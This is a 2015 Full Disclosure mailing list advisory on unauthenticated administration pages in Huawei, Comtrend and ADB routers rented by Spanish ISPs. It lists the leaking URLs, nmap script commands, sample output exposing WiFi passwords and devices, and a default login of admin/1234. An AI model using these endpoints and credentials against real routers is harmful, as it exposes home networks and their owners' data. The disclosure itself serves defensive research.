Full Disclosure mailing list archives
Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation)
From: Daniel Díez <danihzt () gmail com>
Date: Fri, 20 Nov 2015 11:17:16 +0100
Huawei HG253s v2 Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @VicenDominguez Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IPhtml_253s/api/ntwk/WlanBasic http://IP/html_253s/api/system/diagnose_internet http://IP/html_253s/api/system/hostinfo?type=ethhost http://IP/html_253s/api/system/hostinfo?type=guesthost http://IP/html_253s/api/system/hostinfo?type=homehost http://IP/html_253s/api/system/hostinfo?type=wifihost http://IP/html_253s/api/system/wizardcfg Usage nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-vodafone-hua253s: | SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456 | Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX Comtrend VG 8050 Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Usage nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-comtrend-vg-8050: | SSID: MOVISTAR_XXX | Cipher Algorithm: WPA | Password WEP: | Password WPA: gTU3NkXE44RYjuM2RrxM | Password WPA2: | Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X ADB P.DGA4001N (HomeStation) Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the spanish costumers. This new router is coming with a new firmware version. This bug has been found by @DaniLabs Vulnerability Basically, it is not validating the session cookie in some administration webpages. So, It is possible to get direct information from those urls in any router open to internet. http://IP/getWifiInfo.jx http://IP/listDevices.jx http://IP/infoApplications.jx Add the credentials by default are admin / 1234 Usage nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x Nmap scan report for x.x.x.x (x.x.x.x) Host is up (0.34s latency). PORT STATE SERVICE 80/tcp open http | http-enum-telefonica-homestation: | SSID: WLAN_HOME | Cipher Algorithm: WEP | Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X Here the scripts https://github.com/DaniLabs/scripts-nse _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Leak information on Huawei HG253s v2, Comtrend VG 8050 and ADB P.DGA4001N (HomeStation) Daniel Díez (Nov 24)